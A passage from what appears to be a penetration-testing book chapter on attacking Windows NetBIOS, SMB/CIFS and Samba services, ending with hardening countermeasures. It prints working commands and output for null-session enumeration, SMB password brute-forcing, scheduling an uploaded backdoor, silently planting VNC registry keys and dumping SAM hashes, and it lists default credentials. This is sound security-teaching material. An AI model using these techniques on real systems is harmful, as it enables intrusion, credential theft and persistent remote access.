WEBSERV <20> UNIQUE Registered
OSG-WHQ <00> GROUP Registered
OSG-WHQ <1E> GROUP Registered
OSG-WHQ <1D> UNIQUE Registered
__MSBROWSE__ <01> GROUP Registered
WEBSERV <03> UNIQUE Registered
__VMWARE_USER__<03> UNIQUE Registered
ADMINISTRATOR <03> UNIQUE Registered
MAC Address = 00-50-56-C0-A2-09
The information shown in Example 10-13 shows that the
hostname is WEBSERV
, the domain is
OSG-WHQ
, and two current users are
__vmware_user
__ and administrator
. Table 10-5 lists common
NetBIOS name codes and descriptions.
NetBIOS code | Type | Information obtained |
<00> | UNIQUE | Hostname |
<00> | GROUP | Domain name |
<host name><03> | UNIQUE | Messenger service running for that computer |
<user name><03> | UNIQUE | Messenger service running for that individual logged-in user |
<20> | UNIQUE | Server service running |
<1D> | GROUP | Master browser name for the subnet |
<1B> | UNIQUE | Domain master browser name, identifies the PDC for that domain |
The NetBIOS name service is vulnerable to a number of attacks if UDP port 137 is accessible from the Internet or an untrusted network. MITRE CVE lists these issues, shown in Table 10-6.
CVE name | Date | Notes |
CVE-2003-0661 | 03/09/2003 | NBNS in Windows NT 4.0, 2000, XP, and Server 2003 may include random memory in a response to a NBNS query, which can allow remote attackers to obtain sensitive information. |
CVE-2000-0673 | 27/07/2000 | NBNS doesn’t perform authentication, which allows remote attackers to cause a denial-of-service by sending a spoofed Name Conflict or Name Release datagram. |
CVE-1999-0288 | 25/09/1999 | Malformed NBNS traffic results in WINS crash. |
The NetBIOS datagram service is accessible through UDP port 138. As the NetBIOS name service is vulnerable to various naming attacks (resulting in denial-of-service in some cases), so can the NetBIOS datagram service be used to manipulate the target host and its NetBIOS services.
Anthony Osborne of PGP COVERT Labs published an advisory in August 2000 that documented a NetBIOS name cache corruption attack that can be launched by sending crafted UDP datagrams to port 138. The full advisory is available at http://www.securityfocus.com/advisories/2556.
RFC 1002 defines the way in which Windows NetBIOS host information is encapsulated within the NetBIOS datagram header. When a browse frame request is received (on UDP port 138), Windows extracts the information from the datagram header and stores it in the NetBIOS name cache. In particular, the source NetBIOS name and IP address are blindly extracted from the datagram header and inserted into the cache.
A useful scenario in which to undertake this attack would be to send the target host a crafted NetBIOS datagram that mapped a known NetBIOS name on the internal network (such as a domain controller) to your IP address. When the target host attempted to connect to the server by its NetBIOS name, it would instead connect to your IP address. An attacker can use Cain & Abel (http://www.oxid.it) to capture rogue SMB password hashes in this scenario (which he can then crack and use to access other hosts).
Interestingly, Microsoft didn’t release a patch for this issue: due to the unauthenticated nature of NetBIOS naming, it’s a fundamental vulnerability! The MITRE CVE contains good background information within CVE-2000-1079.
The NetBIOS session service is accessible through TCP port 139. In particular, the service facilitates authentication across a Windows workgroup or domain and provides access to resources (such as files and printers). You can perform the following attacks against the NetBIOS session service:
Enumerate details of users, shared folders, security policies, and domain information
Brute-force user passwords
After authenticating with the NetBIOS session service as a privileged user, you can:
Upload and download files and programs
Schedule and run arbitrary commands on the target host
Access the registry and modify keys
Access the SAM password database for cracking
The CESG CHECK guidelines specify that candidates should be able to enumerate system details through NetBIOS (including users, groups, shares, domains, domain controllers, and password policies), including user enumeration through RID cycling. After enumerating system information, candidates are required to brute-force valid user passwords and access the filesystem and registry of the remote host upon authenticating.
Various tools can enumerate sensitive information from a target
Windows host with TCP port 139 open. Information can be collected
either anonymously by initiating what is known as a null session, or through knowledge of a
valid username and password. A null session is when you authenticate
with the IPC$
share of the target
host in the following manner:
net use \targetIPC$ "" /user: ""
By specifying a null username and password, you gain anonymous
access to IPC$
. By default, Windows
hosts allow anonymous access to system and network information through
NetBIOS, so the following can be gleaned:
User list
Machine list
NetBIOS name list
Share list
Password policy information
Group and member list
Local Security Authority (LSA) policy information
Trust information between domains and hosts
Here are three Windows command-line tools that are commonly used to enumerate this information:
enum (http://razor.bindview.com/tools/files/enum.tar.gz) |
winfo (http://www.ntsecurity.nu/toolbox/winfo/) |
GetAcct (http://www.securityfriday.com) |
Many other tools can perform enumeration through null sessions; however, I find that these three utilities give excellent results in terms of user, system, and policy details.
Jordan Ritter’s enum utility is a Windows command-line tool that can extensively query the NetBIOS session service. The tool can list usernames, password policy, shares, and details of other hosts including domain controllers. Example 10-14 shows the enum usage information.
D:enum> enum
usage: enum [switches] [hostname|ip]
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U|-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-L: get LSA policy information
-D: dictionary crack, needs -u and -f
-d: be detailed, applies to -U and -S
-c: don't cancel sessions
-u: specify username to use (default "")
-p: specify password to use (default "")
-f: specify dictfile to use (wants -D)
By default, the tool attempts to use an anonymous null session
to enumerate system information. You can, however, specify a
username and password from the command line or even use the -D
flag along with -u
and -f
<filename>
options to perform
brute-force grinding of a valid user password against the NetBIOS
session service.
Any combination of the query flags can be used within a single
command. Example 10-15 shows
enum
being used to enumerate
user, group details, and password policy information.
D:enum> enum -UGP 192.168.189.1
server: 192.168.189.1
setting up session... success.
password policy:
min length: none
min age: none
max age: 42 days
lockout threshold: none
lockout duration: 30 mins
lockout reset: 30 mins
getting user list (pass 1, index 0)... success, got 5.
__vmware_user__ Administrator Guest Mickey VUSR_OSG-SERV
Group: Administrators
OSG-SERVAdministrator
Group: Backup Operators
Group: Guests
OSG-SERVGuest
Group: Power Users
OSG-SERVMickey
Group: Replicator
Group: Users
NT AUTHORITYINTERACTIVE
NT AUTHORITYAuthenticated Users
Group: __vmware__
OSG-SERV\__vmware_user__
cleaning up... success.
These details show that the out-of-box default Windows 2000
password policy is in place (no minimum password length or account
lockout threshold). Along with the standard Administrator
, Guest
, and other system accounts, the user
Mickey
is also present.
The winfo utility gives a good overview of the target Windows host through a null session. It collects information that enum doesn’t, including domain trust details and currently logged-in users. Example 10-16 demonstrates winfo in use.
D:> winfo 192.168.189.1
Winfo 2.0 - copyright (c) 1999-2003, Arne Vidstrom
- http://www.ntsecurity.nu/toolbox/winfo/
SYSTEM INFORMATION:
- OS version: 5.0
DOMAIN INFORMATION:
- Primary domain (legacy): OSG-WHQ
- Account domain: OSG-SERV
- Primary domain: OSG-WHQ
- DNS name for primary domain:
- Forest DNS name for primary domain:
PASSWORD POLICY:
- Time between end of logon time and forced logoff: No forced logoff
- Maximum password age: 42 days
- Minimum password age: 0 days
- Password history length: 0 passwords
- Minimum password length: 0 characters
LOCOUT POLICY:
- Lockout duration: 30 minutes
- Reset lockout counter after 30 minutes
- Lockout threshold: 0
SESSIONS:
- Computer: OSG-SERV
- User: ADMINISTRATOR
LOGGED IN USERS:
* __vmware_user__
* Administrator
USER ACCOUNTS:
* Administrator
(This account is the built-in administrator account)
* Guest
(This account is the built-in guest account)
* mickey
* VUSR_OSG-SERV
* __vmware_user__
WORKSTATION TRUST ACCOUNTS:
INTERDOMAIN TRUST ACCOUNTS:
SERVER TRUST ACCOUNTS:
SHARES:
* IPC$
- Type: Unknown
- Remark: Remote IPC
* D$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
* ADMIN$
- Type: Special share reserved for IPC or administrative share
- Remark: Remote Admin
* C$
- Type: Special share reserved for IPC or administrative share
- Remark: Default share
By default, Windows systems share all drive letters in use,
such as C$
and D$
in the examples here. These shares can
be accessed remotely upon authenticating, allowing you to upload and
download data. The other shares shown here (IPC$
and ADMIN$
) are for administrative purposes,
such as installing software and managing processes running on the
host remotely.
GetAcct is a useful tool that allows you to perform
reverse-lookups for Windows server RID values to get user account
names (also known as RID
cycling). Standard enumeration tools such as enum and winfo simply use forward-lookup
techniques to dump the user list, which administrators can protect
against by setting RestrictAnonymous=1
within the system
registry (discussed later under the "Windows Networking Services Countermeasures"
section).
Windows NT 4.0 hosts can only set RestrictAnonymous=1
, and are thus
susceptible to RID cycling. Windows 2000 hosts have extended
anonymous access protection which can be set with RestrictAnonymous=2
, preventing RID
cycling from being effective. Figure 10-3 shows GetAcct
in action against a Windows 2000 host at 192.168.189.1
.
The SMBCrack and SMB-AT tools can brute-force user passwords through the NetBIOS session service; they are available from the following sites:
http://www.netxeyes.org/smbcrack.exe |
http://www.cqure.net/tools/smbat-win32bin-1.0.4.zip |
http://www.cqure.net/tools/smbat-src-1.0.5.tar.gz |
Table 10-7 shows a short list of common Windows login and password combinations. Backup and management software including ARCserve and Tivoli require dedicated user accounts on the server or local machine to function, and are often set with weak passwords.
User login name | Password |
Administrator | (blank) |
arcserve | arcserve, backup |
tivoli | tivoli |
backupexec | backupexec, backup |
test | test |
Before launching a brute-force password-grinding exercise, it is sensible to enumerate the account lockout policy for the system you are going to attack, as shown in Example 10-15 and Example 10-16. If you launch a brute-force attack against a domain controller that is set to lock accounts after a specified number of unsuccessful login attempts, you can easily lock out the entire domain.
Upon cracking a valid user account password, you can
authenticate with NetBIOS by using the net
command from a Windows platform or a
tool such as smbclient in
Unix-like environments with Samba (http://www.samba.org) installed. The net
command usage is as follows:
net use \targetIPC$ password /user:username
You can also use the net
utility to authenticate with ADMIN$
or administrative drive shares (C$
,
D$
, etc.). After successfully
authenticating, you can try to execute commands server-side, upload
and download files, and modify registry keys.
You can execute local commands through SMB via the Service Control Manager (SCM) or Task
Scheduler. To execute commands though the Task Scheduler, we use the
Windows schtasks
command upon
authenticating with a NetBIOS session or CIFS service with the
ADMIN$
share. The schtasks
command schedules programs to run
at a designated time through the Task Scheduler service. Example 10-17 shows how I
authenticate against 192.168.189.1
(with the username Administrator
and password secret
), and then
schedule c: empo2k.exe (a
known backdoor that I have uploaded) to run at 10:30.
C:> schtasks /create /s 192.168.189.1 /u WEBSERVAdministrator /p secret /sc ONCE
/st 10:30:00 /tr c: empo2k.exe /tn BackupExec
schtasks
has a lot of options
and flags that can be set and used. Please review Microsoft KB article
814596 (http://support.microsoft.com/kb/814596)
for further details and use cases. We can review pending jobs on
192.168.189.1
in the following
way:
C:> schtasks /query /s 192.168.189.1
TaskName Next Run Time Status
==================================== ======================== ===============
BackupExec 10:30:00, 08/07/2007
To execute commands directly through the SCM (as opposed to the Task Scheduler), we can use PsExec (part of the Sysinternals PsTools package, available from http://download.sysinternals.com/files/pstools.zip). PsExec usage is discussed in http://www.microsoft.com/technet/sysinternals/utilities/psexec.mspx.
You can use three tools from the Microsoft Windows NT Resource Kit to access and manipulate system registry keys on a given host:
Accesses and dumps the system registry remotely
Used to set and modify registry keys remotely
Used with the delete
option to remove registry keys
After authenticating with the NetBIOS session service, regdmp is used to dump the contents of the registry. regdmp has the following usage:
REGDMP [-m \machinename | -h hivefile hiveroot | -w Win95 Directory] [-i n] [-o outputWidth] [-s] [-o outputWidth] registryPath
Example 10-18 shows
regdmp in use against 192.168.189.1
to dump the contents of the
entire system registry.
C:> regdmp -m \192.168.189.1
Registry
Machine [17 1 8]
HARDWARE [17 1 8]
ACPI [17 1 8]
DSDT [17 1 8]
GBT__ _ [17 1 8]
AWRDACPI [17 1 8]
00001000 [17 1 8]
00000000 = REG_BINARY 0x00003bb3 0x54445344
0x00003bb3 0x42470101 0x20202054
0x44525741 0x49504341 0x00001000
0x5446534d 0x0100000c 0x5f5c1910
0x5b5f5250 0x2e5c1183 0x5f52505f
0x30555043 0x00401000 0x5c080600
0x5f30535f 0x0a040a12 0x0a000a00
0x08000a00 0x31535f5c 0x040a125f
You can add or modify registry keys using the regini
command along with crafted text files
containing the new keys and values. To silently install a VNC server
on a target host, you first have to set two registry keys to define
which port the service listens on and the VNC password for
authentication purposes. A text file (winvnc.ini in this case) is assembled
first:
HKEY_USERS.DEFAULTSoftwareORLWinVNC3 SocketConnect = REG_DWORD 0X00000001 Password = REG_BINARY 0x00000008 0x57bf2d2e 0x9e6cb06e
After listing the keys you wish to add to the registry, use the
regini
command to insert
them:
C:> regini -m \192.168.189.1 winvnc.ini
Removing registry keys from the remote system is easily achieved
using the reg
command (found within
Windows NT family systems) with the correct delete
option. To remove the VNC keys just
set, use the following command:
C:> reg delete \192.168.189.1HKU.DEFAULTSoftwareORLWinVNC3
Through compromising the password of a user in the Administrators group, the SAM encrypted
password hashes can be dumped directly from memory of the remote host,
thus bypassing SYSKEY encryption protecting the hashes stored within
the SAM database file. A Windows utility known as pwdump3 can achieve this by authenticating
first with the ADMIN$
share and
then extracting the encrypted user password hashes. pwdump3 is available from http://packetstormsecurity.org/crackers/nt/pwdump3.zip.
Example 10-19 shows
pwdump3 dumping the encrypted
user password hashes from the Windows 2000 host at 192.168.189.1
to hashes.txt using the Administrator account (although any user
account in the Administrators
group can be used).
D:pwdump>pwdump3 192.168.189.1 hashes.txt Administrator
pwdump3 by Phil Staubs, e-business technology Copyright 2001 e-business technology, Inc. This program is free software based on pwpump2 by Tony Sabin under the GNU General Public License Version 2 (GNU GPL), you can redistribute it and/or modify it under the terms of the GNU GPL, as published by the Free Software Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS PROGRAM. Please see the COPYING file included with this program (also available at www.ebiz-tech.com/pwdump3) and the GNU GPL for further details. Please enter the password >secret
Completed.
Two tools that can be used to crack Windows password hashes downloaded in this way are as follows:
Cain & Abel (http://www.oxid.it) |
John the Ripper (http://www.openwall.com/john) |
Cain & Abel is more advanced, supporting rainbow table cracking of NTLM hashes, whereas John the Ripper is used to perform basic (and quick) dictionary-based attacks. Rainbow cracking of stored authentication hashes involves a time-memory trade-off, where hashes are precomputed and stored in a rainbow table, which is then cross-referenced with the hashes to reveal the passwords.
Three toolkits used to generate rainbow tables that can be used from Cain & Abel to attack many types of encrypted password hash are as follows:
Winrtgen (http://www.oxid.it/downloads/winrtgen.zip) |
Ophcrack (http://ophcrack.sourceforge.net) |
RainbowCrack (http://www.antsight.com/zsl/rainbowcrack) |
The CIFS service is found running on Windows 2000, XP, and 2003 hosts through both TCP and UDP port 445. CIFS is the native mode for SMB access within these operating systems, but NetBIOS access is provided for backward compatibility.
Through CIFS, you can perform exactly the same tests as with the NetBIOS session service, including enumeration of user and system details, brute-force of user passwords, and system access upon authenticating (such as file access and execution of arbitrary commands).
In the same way that system and user information can be gathered through accessing SMB services through NetBIOS, CIFS can be directly queried to enumerate the same information: you just need the right tools for the job.
The SMB Auditing Tool (SMB-AT) is a suite of useful utilities, available as Windows executables and source code (for compilation on Linux and BSD platforms in particular) from http://www.cqure.net.
The smbdumpusers utility
is a highly versatile Windows NT user enumeration tool that can
query SMB through both NetBIOS session (TCP 139) and CIFS (TCP 445)
services. A second useful feature is the way the utility can
enumerate users through a direct dump that works with RestrictAnonymous=0
, but also using the
RID cycling technique that can evade RestrictAnonymous=1
settings by attempting
to reverse each ID value to a username. Example 10-20 shows the usage
and command-line options for smbdumpusers.
D:smb-at> smbdumpusers
SMB - DumpUsers V1.0.4 by ([email protected])
-------------------------------------------------------------------
usage: smbdumpusers -i <ipaddress|ipfile> [options]
-i* IP or <filename> of server[s] to bruteforce
-m Specify which mode
1 Dumpusers (Works with restrictanonymous=0)
2 SidToUser (Works with restrictanonymous=0|1)
-f Filter output
0 Default (Filter Machine Accounts)
1 Show All
-e Amount of sids to enumerate
-E Amount of sid mismatches before aborting mode 2
-n Start at SID
-s Name of the server to bruteforce
-r Report to <ip>.txt
-t timeout for connect (default 300ms)
-v Be verbose
-P Protocol version
0 - Netbios Mode
1 - Windows 2000 Native Mode
Example 10-21 shows the smbdumpusers tool dumping user information via RID cycling (as with GetAcct in Figure 10-3) through CIFS.
The SMB-AT toolkit contains a utility called smbbf that can launch brute-force password-grinding attacks against both NetBIOS session and CIFS services. Example 10-22 shows the smbbf usage.
D:smb-at> smbbf
SMB - Bruteforcer V1.0.4 by ([email protected])
--------------------------------------------------------------
usage: smbbf -i [options]
-i* IP address of server to bruteforce
-p Path to file containing passwords
-u Path to file containing users
-s Server to bruteforce
-r Path to report file
-t timeout for connect (default 300ms)
-w Workgroup/Domain
-g Be nice, automatically detect account lockouts
-v Be verbose
-P Protocol version
0 - Netbios Mode
1 - Windows 2000 Native Mode
To run smbbf against the
CIFS service at 192.168.189.1
,
using the user list from users.txt and the dictionary file common.txt, use the syntax shown in Example 10-23.
D:smb-at> smbbf -i 192.168.189.1 -p common.txt -u users.txt -v -P1
INFO: Could not determine server name ...
-- Starting password analysis on 192.168.189.1 --
Logging in as Administrator with secret on WIDGETS
Access denied
Logging in as Administrator with qwerty on WIDGETS
Access denied
Logging in as Administrator with letmein on WIDGETS
Access denied
Logging in as Administrator with password on WIDGETS
Access denied
Logging in as Administrator with abc123 on WIDGETS
Access denied
The smbbf utility can clock around 1,200 login attempts per second when grinding Windows 2000 hosts across local area networks. Against NT 4.0 hosts, the tool is much slower, achieving only a handful of login attempts per second.
If smbbf is run with only an IP address specified, it does the following:
Retrieves a list of valid usernames through a null session
Attempts to log in to each account with a blank password
Attempts to log in to each account with the username as password
Attempts to log in to each account with the password of “password”
The tool is extremely useful in this mode when performing a brief audit of a given Windows host, and can be left running unattended for extended periods of time. If multiple accounts are given to brute force, the tool will grind passwords for each account and move to the next.
The Samba open source suite (http://www.samba.org) allows Linux and other Unix-like platforms to operate more easily within Windows NT domains and provides seamless file and print services to SMB and CIFS clients. A number of remote vulnerabilities have been found in Samba services, allowing attackers to execute arbitrary code and commands and bypass security restrictions.
At the time of this writing, the MITRE CVE list contains a number of serious remotely exploitable issues in Samba (not including DoS issues), as shown in Table 10-8.
Date | Notes | |
CVE-2007-2446 and CVE-2007-2447 | 15/05/2007 | Multiple Samba 3.0.25rc3 MSRPC component vulnerabilities |
CVE-2007-0453 | 05/02/2007 | nss_winbind.so.1 (as used by Samba 3.0.23d on Solaris) arbitrary code execution via DNS functions |
CVE-2004-1154 | 16/12/2004 | Samba 3.0.9 MSRPC heap overflow |
CVE-2004-0882 | 15/10/2004 | Samba 3.0.7 QFILEPATHINFO request handler overflow |
CVE-2004-0815 | 30/09/2004 | Samba 3.0.2a malformed pathname security restriction bypass |
CVE-2003-1332 | 27/07/2003 | Samba 2.2.7 reply_nttrans( ) overflow |
CVE-2003-0201 | 07/04/2003 | Samba 2.2.7 call_trans2open( ) overflow |
CVE-2003-0085 | 14/03/2003 | Samba 2.2.7 remote packet fragment overflow |
CVE-2002-1318 | 20/11/2002 | Samba 2.2.6 password change request overflow |
CVE-2002-2196 | 28/08/2002 | Samba 2.2.4 and prior enum_csc_policy( ) overflow |
CVE-2001-1162 | 24/06/2001 | Samba 2.0.8 and prior remote file creation vulnerability |
MSF supports CVE-2003-0201 and CVE-2007-2446. Immunity CANVAS supports CVE-2003-0201 and CVE-2003-0085, and CORE IMPACT supports CVE-2003-0201, CVE-2003-0085, CVE-2007-2446, and CVE-2007-2447 at this time. Milw0rm (http://www.milw0rm.com) has a number of useful Samba exploits, including exploits for the Samba SWAT web server.
Depending on the open network ports of a given Unix-like host running Samba, you will be presented with a number of avenues to perform enumeration and brute-force password-grinding attacks. In particular, refer to the earlier examples of attacks launched against MSRPC, NetBIOS session, and CIFS services because the same tools will be equally effective against accessible Samba services running on ports 135, 139, and 445, respectively.
The following countermeasures should be considered when hardening Windows services:
Filter public or untrusted network access to high-risk services, especially the RPC endpoint mapper (TCP and UDP port 135), and the NetBIOS session and CIFS services (TCP ports 139 and 445), which can be attacked and used to compromise Windows environments. Do not forget to filter RPC service endpoints, accessible on TCP and UDP ports above 1025.
Ensure local administrator account passwords are set because these are often set to NULL on workstations when domain authentication is used. If possible, disable the local computer Administrator accounts across your network.
Enforce a decent user account lockout policy to minimize the impact of brute-force password-grinding attacks.
Microsoft RPC service-specific countermeasures:
If RPC services are accessible from the Internet, ensure that the latest Microsoft security patches relating to RPC components are always installed and maintained to a good degree.
Disable the Task Scheduler and Messenger services if they aren’t required. The Task Scheduler can be used by attackers to remotely execute commands, and both services have known memory management issues.
In high-security environments, you can consider disabling DCOM completely, although it will break a lot of functionality. Microsoft KB article 825750 discusses this; you can find it at http://support.microsoft.com/default.aspx?kbid=825750.
Be aware of threats presented by RPC over HTTP functionality
within Microsoft IIS web services (when COM Internet Services is
installed). Ensure that the RPC_CONNECT
HTTP method isn’t allowed
(unless required) through any publicly accessible web services in
your environment.
NetBIOS session and CIFS service-specific countermeasures:
Enforce RestrictAnonymous=2
under Windows 2000, XP, and 2003 hosts to prevent enumeration of
system information through NetBIOS. The registry key can be found
under HKLMSYSTEMCurrentControlSetControlLsa.
Microsoft KB articles 246261 and 296405 discuss the setting in
detail, available from http://support.microsoft.com.
Enforce NTLMv2 if possible. Fast, multithreaded brute-force tools, such as SMBCrack, take advantage of weaknesses within standard NTLM, and therefore don’t work against the cryptographically stronger NTLMv2.
Rename the Administrator account to a nonobvious name (e.g., not admin or root), and set up a decoy Administrator account with no privileges.
The Microsoft Windows 2000 Resource Kit contains a tool called
passprop.exe that can lock the
administrator account and prevent it from being used across the
network (thus negating brute-force and other attacks), but still
allows administrator logons locally at the system console. To lock
the Administrator account in
this way, issue a passprop
/adminlockout
command.
18.119.113.199